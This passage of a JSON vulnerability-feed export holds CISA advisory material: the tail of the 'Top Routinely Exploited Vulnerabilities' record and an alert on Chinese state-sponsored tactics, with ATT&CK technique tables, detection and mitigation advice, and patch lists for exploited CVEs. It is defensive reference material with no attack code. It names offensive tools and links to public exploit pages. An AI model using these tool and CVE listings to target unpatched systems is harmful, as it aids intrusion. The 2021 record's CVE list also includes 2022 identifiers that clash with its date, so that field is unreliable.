Vulnerabilities](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf>)\n\n[[11] NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n[[12] NCSC-Canada\u2019s Communications Security Establishment-NSA-CISA Advisory: APT29 Targets COVID-19 Vaccine Development (CSE)](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)\n\n[[13] ACSC Advisory: Summary of Tactics, Techniques and Procedures Used to Target Australian Networks](<https://www.cyber.gov.au/acsc/view-all-content/advisories/summary-tactics-techniques-and-procedures-used-target-australian-networks>)\n\n[[14] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)\n\n[[15] CISA Alert: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[16] CISA Emergency Directive (ED 20-03): Windows DNS Server Vulnerability](<https://www.cisa.gov/blog/2020/07/16/emergency-directive-ed-20-03-windows-dns-server-vulnerability>)\n\n[[17] NCSC Alert: Alert: Multiple Actors are Attempting to Exploit MobileIron Vulnerability CVE 2020-15505](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>)\n\n[[18] NJCCIC Alert: APT10 Adds ZeroLogon Exploitation to TTPs](<https://www.cyber.nj.gov/alerts-advisories/apt10-adds-zerologon-exploitation-to-ttps>)\n\n### Revisions\n\nInitial Version: July 28, 2021|August 4, 2021: Fixed typo|August 20, 2021: Adjusted vendor name for CVE-2020-1472\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Top Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-08-20T12:00:00", "id": "AA21-209A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:29:31", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n_**Note**: on October 20, 2020, the National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) providing information on publicly known vulnerabilities exploited by Chinese state-sponsored cyber actors to target computer networks holding sensitive intellectual property, economic, political, and military information. This Alert has been updated to include information on vulnerabilities exploited by Chinese state-sponsored actors (see Table 4)._\n\nIn light of heightened tensions between the United States and China, the Cybersecurity and Infrastructure Security Agency (CISA) is providing specific Chinese government and affiliated cyber threat actor tactics, techniques, and procedures (TTPs) and recommended mitigations to the cybersecurity community to assist in the protection of our Nation\u2019s critical infrastructure. In addition to the recommendations listed in the Mitigations section of this Alert, CISA recommends organizations take the following actions.\n\n 1. **Adopt a state of heightened awareness. **Minimize gaps in personnel availability, consistently consume relevant threat intelligence, and update emergency call trees.\n 2. **Increase organizational vigilance.** Ensure security personnel monitor key internal security capabilities and can identify anomalous behavior. Flag any known Chinese indicators of compromise (IOCs) and TTPs for immediate response.\n 3. **Confirm reporting processes.** Ensure personnel know how and when to report an incident. The well-being of an organization\u2019s workforce and cyber infrastructure depends on awareness of threat activity. Consider [reporting incidents](<https://us-cert.cisa.gov/report>) to CISA to help serve as part of CISA\u2019s early warning system (see the Contact Information section below).\n 4. **Exercise organizational incident response plans.** Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are various data sources logging as expected? Ensure personnel are positioned to act in a calm and unified manner.\n\n### Technical Details\n\n#### China Cyber Threat Profile\n\nChina has a history of using national military and economic resources to leverage offensive cyber tactics in pursuing its national interests. The \u201cMade in China 2025\u201d 10-year plan outlines China\u2019s top-level policy priorities.[[1](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)],[[2](<https://fas.org/sgp/crs/row/IF10964.pdf>)] China may seek to target the following industries deemed critical to U.S. national and economic interests: new energy vehicles, next generation information technology (IT), biotechnology, new materials, aerospace, maritime engineering and high-tech ships, railway, robotics, power equipment, and agricultural machinery.[[3](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)] China has exercised its increasingly sophisticated capabilities to illegitimately obtain U.S. intellectual property (IP), suppress both social and political perspectives deemed dangerous to China, and harm regional and international opponents.\n\nThe U.S. Intelligence Community and various private sector threat intelligence organizations have identified the Chinese People\u2019s Liberation Army (PLA) and Ministry of State Security (MSS) as driving forces behind Chinese state-sponsored cyberattacks\u2013either through contractors in the Chinese private sector or by the PLA and MSS entities themselves. China continues to engage in espionage-related activities that include theft of sensitive information such as innovation capital, IP, and personally identifiable information (PII). China has demonstrated a willingness to push the boundaries of their activities to secure information critical to advancing their economic prowess and competitive advantage.\n\n#### Chinese Cyber Activity\n\nAccording to open-source reporting, offensive cyber operations attributed to the Chinese government targeted, and continue to target, a variety of industries and organizations in the United States, including healthcare, financial services, defense industrial base, energy, government facilities, chemical, critical manufacturing (including automotive and aerospace), communications, IT, international trade, education, videogaming, faith-based organizations, and law firms.\n\nAdditionally, numerous Department of Justice (DOJ) indictments over several years provide evidence to suggest Chinese threat actors continuously seek to illegally obtain and exfiltrate U.S. IP. Their targets also include western companies with operations inside China.\n\nPublic reporting that associates Chinese actors with a range of high-profile attacks and offensive cyber activity includes:\n\n * **February 2013 \u2013 Cyber Threat Intelligence Researchers Link Advanced Persistent Threat (APT) 1 to China:** a comprehensive report publicly exposed APT1 as part of China\u2019s military cyber operations and a multi-year effort that exfiltrated IP from roughly 141 companies spanning 20 major industries.[[4](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)] APT1 established access to the victims\u2019 networks and methodically exfiltrated IP across a large range of industries identified in China\u2019s 12th 5-Year Plan. A year later, the DOJ indicted Chinese cyber threat actors assigned to PLA Unit 61398 for the first time (also highlighted in the report).[[5](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)]\n * **April 2017 \u2013 Chinese APTs Targeting IP in 12 Countries:** CISA announced Chinese state-backed APTs carried out a multi-year campaign of cyber-enabled IP theft that targeted global technology service providers and their customers. The threat actors leveraged stolen administrative credentials (local and domain) and placed sophisticated malware on critical systems in an effort to steal the IP and sensitive data of companies located in at least 12 countries.[[6](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)]\n * **December 2018 \u2013 Chinese Cyber Threat Actors Indicted for Compromising Managed Service Providers (MSPs):** DOJ indicted two Chinese cyber threat actors believed to be associated with APT10, who targeted MSPs and their large customer base through phishing and spearphishing campaigns aimed at exfiltrating sensitive business data and, possibly, PII.[[7](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)] CISA also briefed stakeholders on Chinese APT groups who targeted MSPs and their customers to steal data and further operationalize commercial and economic espionage.[[8](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)]\n * **February 2020 \u2013 China\u2019s Military Indicted for 2017 Equifax Hack:** DOJ indicted members of China\u2019s PLA for stealing large amounts of PII and IP. The Chinese cyber threat actors exploited a vulnerability in the company\u2019s dispute resolution website to enter the network, conduct reconnaissance, upload malware, and steal credentials to extract the targeted data. The breach impacted roughly half of all American citizens and stole Equifax\u2019s trade secrets.[[9](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)]\n * **May 2020 \u2013 China Targets COVID-19 Research Organizations:** the Federal Bureau of Investigation (FBI) and CISA reported the targeting and compromise of U.S. organizations conducting COVID-19-related research by cyber actors affiliated with China.[[10](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)] Large-scale password spraying campaigns were a commonly observed tactic in illicitly obtaining IP related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.[[11](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)],[[12](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity%20>)]\n\n#### Common TTPs of Publicly Known Chinese Threat Actors\n\nThe section below provides common, publicly known, TTPs employed by Chinese threat actors, which map to the MITRE ATT&CK framework. Where possible, the tables include actions for detection and mitigation. This section is not exhaustive and does not detail all TTPs or detection and mitigation actions. \n\n#### PRE-ATT&CK TTPs\n\nChinese threat actors commonly use the techniques listed in table 1 to achieve reconnaissance (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/tactics/TA0015/>)]), staging (_Stage Capabilities_ [[TA0026](<https://attack.mitre.org/tactics/TA0026/>)]), and testing (_Test Capabilities_ [[TA0025](<https://attack.mitre.org/tactics/TA0025/>)]) before executing an attack. PRE-ATT&CK techniques can be difficult to detect and mitigate, however, defenders should be aware of the use of these techniques.\n\n_Table 1: Chinese threat actor PRE-ATT&CK techniques_\n\n**Technique** | **Description** \n---|--- \n_Acquire and/or Use 3rd Party Software Services_ [[T1330](<https://attack.mitre.org/techniques/T1330/>)] | Staging and launching attacks from software as a service solutions that cannot be easily tied back to the APT \n_Compromise 3rd Party Infrastructure to Support Delivery_ [[T1334](<https://attack.mitre.org/techniques/T1334/>)] | Compromising infrastructure owned by other parties to facilitate attacks (instead of directly purchasing infrastructure) \n_Domain Registration Hijacking_ [[T1326](<https://attack.mitre.org/techniques/T1326/>)] | Changing the registration of a domain name without the permission of its original registrant and then using the legitimate domain as a launch point for malicious purposes \n_Acquire Open-Source Intelligence (OSINT) Data Sets and Information_ [[T1247](<https://attack.mitre.org/techniques/T1247/>)] | Gathering data and information from publicly available sources, including public-facing websites of the target organization \n_Conduct Active Scanning _[[T1254](<https://attack.mitre.org/techniques/T1254/>)] | Gathering information on target systems by scanning the systems for vulnerabilities. Adversaries are likely using tools such as Shodan to identify vulnerable devices connected to the internet \n_Analyze Architecture and Configuration Posture _[[T1288](<https://attack.mitre.org/techniques/T1288/>)] | Analyzing technical scan results to identify architectural flaws, misconfigurations, or improper security controls in victim networks \n_Upload, Install, and Configure Software/Tools_ [[T1362](<https://attack.mitre.org/techniques/T1362>)] | Placing malware on systems illegitimately for use during later stages of an attack to facilitate exploitability and gain remote access \n \n#### Enterprise ATT&CK TTPs\n\nChinese threat actors often employ publicly known TTPs against enterprise networks. To orchestrate attacks, they use commonly implemented security testing tools and frameworks, such as:\n\n * Cobalt Strike and Beacon\n * Mimikatz\n * PoisonIvy\n * PowerShell Empire\n * China Chopper Web Shell\n\nTable 2 lists common, publicly known, TTPs used by Chinese threat actors against enterprise networks and provides options for detection and mitigation based on the MITRE ATT&CK framework.\n\n_Table 2: Common Chinese threat actor techniques, detection, and mitigation_\n\n**Technique / Sub-Technique** | **Detection** | **Mitigation** \n---|---|--- \n_Obfuscated Files or Information _[[T1027](<https://attack.mitre.org/techniques/T1027/>)] | \n\n * Detect obfuscation by analyzing signatures of modified files.\n * Flag common syntax used in obfuscation.\n| \n\n * Use antivirus/antimalware software to analyze commands after processing. \n_Phishing: Spearphishing Attachment _[[T1566.001](<https://attack.mitre.org/techniques/T1566/001/>)] and _Spearphishing Link _[[T1566.002](<https://attack.mitre.org/techniques/T1566/002/>)] | \n\n * Use network intrusion detection systems (NIDS) and email gateways to detect suspicious attachments in email entering the network.\n * Use detonation chambers to inspect email attachments in isolated environments.\n| \n\n * Quarantine suspicious files with antivirus solutions.\n * Use network intrusion prevention systems to scan and remove malicious email attachments.\n * Train users to identify phishing emails and notify IT. \n_System Network Configuration Discovery_ [[T1016](<https://attack.mitre.org/techniques/T1016/>)] | \n\n * Monitor for processes and command-line arguments that could be used by an adversary to gather system and network information.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Command and Scripting Interpreter: Windows Command Shell _[[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)] | \n\n * Identify normal scripting behavior on the system then monitor processes and command-line arguments for suspicious script execution behavior.\n| \n\n * Only permit execution of signed scripts.\n * Disable any unused shells or interpreters. \n \n_User Execution: Malicious File _[[T1204.002](<https://attack.mitre.org/techniques/T1204/002/>)] | \n\n * Monitor execution of command-line arguments for applications (including compression applications) that may be used by an adversary to execute a user interaction.\n * Set antivirus software to detect malicious documents and files downloaded and installed on endpoints.\n| \n\n * Use execution prevention to prevent the running of executables disguised as other files.\n * Train users to identify phishing attacks and other malicious events that may require user interaction. \n_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder _[[T1547.001](<https://attack.mitre.org/techniques/T1547/001/>)] | \n\n * Monitor the start folder for additions and changes.\n * Monitor registry for changes to run keys that do not correlate to known patches or software updates.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Command and Scripting Interpreter: PowerShell _[[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)] | \n\n * Enable PowerShell logging.\n * Monitor for changes in PowerShell execution policy as a method of identifying malicious use of PowerShell.\n * Monitor for PowerShell execution generally in environments where PowerShell is not typically used.\n| \n\n * Set PowerShell execution policy to execute only signed scripts.\n * Disable PowerShell if not needed by the system.\n * Disable WinRM service to help prevent use of PowerShell for remote execution.\n * Restrict PowerShell execution policy to administrators. \n_Hijack Execution Flow: DLL Side-Loading _[[T1574.002](<https://attack.mitre.org/techniques/T1574/002/>)] | \n\n * Track Dynamic Link Library (DLL) metadata, and compare DLLs that are loaded at process execution time against previous executions to detect usual differences unrelated to patching.\n| \n\n * Use the program `sxstrace.exe` to check manifest files for side-loading vulnerabilities in software.\n * Update software regularly including patches for DLL side-loading vulnerabilities. \n_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/techniques/T1105/>)] | \n\n * Monitor for unexpected file creation or files transfer into the network from external systems, which may be indicative of attackers staging tools in the compromised environment.\n * Analyze network traffic for unusual data flows (i.e., a client sending much more data than it receives from a server).\n| \n\n * Use network intrusion detection and prevention systems to identify traffic for specific adversary malware or unusual data transfer over protocols such as File Transfer Protocol. \n_Remote System Discovery_ [[T1018](<https://attack.mitre.org/techniques/T1018/>)] | \n\n * Monitor processes and command-line arguments for actions that could be taken to gather system and network information.\n * In cloud environments, usage of commands and application program interfaces (APIs) to request information about remote systems combined with additional unexpected commands may be a sign of malicious use.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Software Deployment Tools_ [[T1072](<https://attack.mitre.org/techniques/T1072/>)] | \n\n * Identify the typical use pattern of third-party deployment software, then monitor for irregular deployment activity.\n| \n\n * Isolate critical network systems access using group policies, multi-factor authentication (MFA), and firewalls.\n * Patch deployment systems regularly.\n * Use unique and limited credentials for access to deployment systems. \n_Brute Force: Password Spraying_ [[T1110.003](<https://attack.mitre.org/techniques/T1110/003/>)] | \n\n * Monitor logs for failed authentication attempts to valid accounts.\n| \n\n * Use MFA.\n * Set account lockout policies after a certain number of failed login attempts. \n_Network Service Scanning_ [[T1046](<https://attack.mitre.org/techniques/T1046/>)] | \n\n * Use NIDS to identify scanning activity.\n| \n\n * Close unnecessary ports and services.\n * Segment network to protect critical servers and devices. \n_Email Collection _[[T1114](<https://attack.mitre.org/techniques/T1114/>)] | \n\n * Monitor processes and command-line arguments for actions that could be taken to gather local email files.\n| \n\n * Encrypt sensitive emails.\n * Audit auto-forwarding email rules regularly.\n * Use MFA for public-facing webmail servers. \n_Proxy: External Proxy_ [[T1090.002](<https://attack.mitre.org/techniques/T1090/002/>)] | \n\n * Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server.\n| \n\n * Use NIDS and prevention systems to identify traffic for specific adversary malware using network signatures. \n_Drive-by Compromise _[[T1189](<https://attack.mitre.org/techniques/T1189/>)] | \n\n * Use Firewalls and proxies to inspect URLs for potentially known-bad domains or parameters.\n * Monitor network intrusion detection systems (IDS) to detect malicious scripts, and monitor endpoints for abnormal behavior.\n\n| \n\n * Isolate and sandbox impacted systems and applications to restrict the spread of malware.\n * Leverage security applications to identify malicious behavior during exploitation.\n * Restrict web-based content through ad-blockers and script blocking extensions. \n_Server Software Component: Web Shell_ [[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)] | \n\n * Analyze authentication logs, files, netflow/enclave netflow, and leverage process monitoring to discover anomalous activity.\n| \n\n * Patch vulnerabilities in internet facing applications.\n * Leverage file integrity monitoring to identify file changes.\n * Configure server to block access to the web accessible directory through principle of least privilege. \n_Application Layer Protocol: File Transfer Protocols _[[T1071.002](<https://attack.mitre.org/techniques/T1071/002/>)] and _DNS_ [[T1071.004](<https://attack.mitre.org/techniques/T1071/004/>)] | \n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.\n| \n\n * Leverage NIDS and NIPS using network signatures to identify traffic for specific adversary malware. \n \n#### Additional APT Activity\n\nThe TTPs listed above have been repeatedly used across the spectrum of Chinese threat actors. The mitigations referenced in this alert can help reduce vulnerability to these TTPs; however, defenders should also maintain heightened awareness of threats actors that are more innovative in their approach, making it difficult to detect and respond to compromise. Publicly reported examples[[13](<https://www.fireeye.com/current-threats/apt-groups.html>)] include:\n\n * **APT3 **(known as UPS Team) is known for deploying zero-day attacks that target Internet Explorer, Firefox, and Adobe Flash Player. The group\u2019s custom implants and changing Command and Control (C2) infrastructure make them difficult to track. APT3 exploits use Rivest Cypher 4 (RC4) encryption to communicate and bypass address space layout randomization (ASLR)/Data Execution Prevention (DEP) by using Return Oriented Programming (ROP) chains.[[14](<https://attack.mitre.org/groups/G0022/>)]\n * **APT10 **(known as MenuPass Group) has established accessed to victim networks through compromised service providers, making it difficult for network defenders to identify the malicious traffic.\n * **APT19** (known as Codoso and Deep Panda) is known for developing custom Rich Text Format (RTF) and macro-enabled Microsoft Office documents for both implants and payloads. The group has backdoored software, such as software serial generators, and has an elite use of PowerShell for C2 over Hyper Text Transfer Protocol (HTTP)/Hyper Text Transfer Protocol Secure (HTTPS).[[15](<https://attack.mitre.org/groups/G0073/>)]\n * **APT40** (known as Leviathan) has targeted external infrastructure with success, including internet-facing routers and virtual private networks.\n * **APT41 **(known as Double Dragon) has exploited vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central to compromise victims.[[16](<https://attack.mitre.org/groups/G0096/>)]\n\n### Mitigations\n\n### Recommended Actions\n\nThe following list provides actionable technical recommendations for IT security professionals to reduce their organization\u2019s overall vulnerability. These recommendations are not exhaustive; rather they focus on the actions that will greatly reduce stakeholders\u2019 attack surface.\n\n 1. **Patch systems and equipment promptly and diligently. **Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally-facing (i.e., internet) equipment. Certain vulnerabilities\u2014including CVE-2012-0158 in Microsoft products [[17](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)], CVE-2019-19781 in Citrix devices [[18](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)], and CVE-2020-5902 in BIG-IP Traffic Management User Interface [[19](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)]\u2014have presented APTs with prime targets to gain initial access. Chinese APTs often use existing exploit code to target routinely exploited vulnerabilities [[20](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)], which present an opportunistic attack that requires limited resources. See table 3 for patch information on CVEs that have been routinely exploited by Chinese APTs. See table 4 for patch information on vulnerabilities that the National Security Agency (NSA) has stated are actively used by Chinese state-sponsored cyber actors.\n\n_Table 3: Patch information for vulnerabilities routinely exploited by Chinese APT actors_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) | \n\nMicrosoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0\n\n| \n\n * [Microsoft Security Bulletin MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027>) \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n[CVE-2019-16920](<https://nvd.nist.gov/vuln/detail/CVE-2019-16920>) | \n\n * D-Link products DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825\n| \n\n * [D-Link Security Advisory: DAP-1533 Rv Ax, DGL-5500 Rv Ax, DHP-1565 Rv Ax, DIR-130 Rv Ax, DIR-330 Rv Ax, DIR-615 Rv Ix, (non-US) DIR-652 Rv Bx, DIR-655 Rv Cx, DIR-825 Rv Cx, DIR-835 Rv Ax, DIR-855L Rv Ax, (non-US) DIR-862 Rv Ax, DIR-866L Rv Ax :: CVE-2019-16920 :: Unauthenticated Remote Code Execution (RCE) Vulnerability](<https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10124>) \n[CVE-2019-16278](<https://nvd.nist.gov/vuln/detail/CVE-2019-16278>) | \n\n * Nostromo 1.9.6 and below\n| \n\n * [Nostromo 1.9.6 Directory Traversal/ Remote Command Execution](<https://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html>)\n * [Nostromo 1.9.6 Remote Code Execution](<https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html>) \n \n[CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>) | \n\n * Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers\n| \n\n * [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>) \n[CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) | \n\n * Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers\n| \n\n * [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>) \n[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) | \n\n * Zoho ManageEngine Desktop Central before 10.0.474\n| \n\n * [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) \n \n_Table 4: Patch information for NSA listed vulnerabilities used by Chinese state-sponsored cyber actors [[21](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)]_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2020-8193](<https://nvd.nist.gov/vuln/detail/CVE-2020-8193>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2020-8195](<https://nvd.nist.gov/vuln/detail/CVE-2020-8195>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2020-8196](<https://nvd.nist.gov/vuln/detail/CVE-2020-8196>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708>) | \n\n * Windows 7 for 32-bit Systems Service Pack 1\n * Windows 7 for x64-based Systems Service Pack 1\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for Itanium-Based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>) \n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | \n\n * MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0\n * Sentry versions 9.7.2 and earlier, and 9.8.0;\n * Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier\n| \n\n * [MobileIron Blog: MobileIron Security Updates 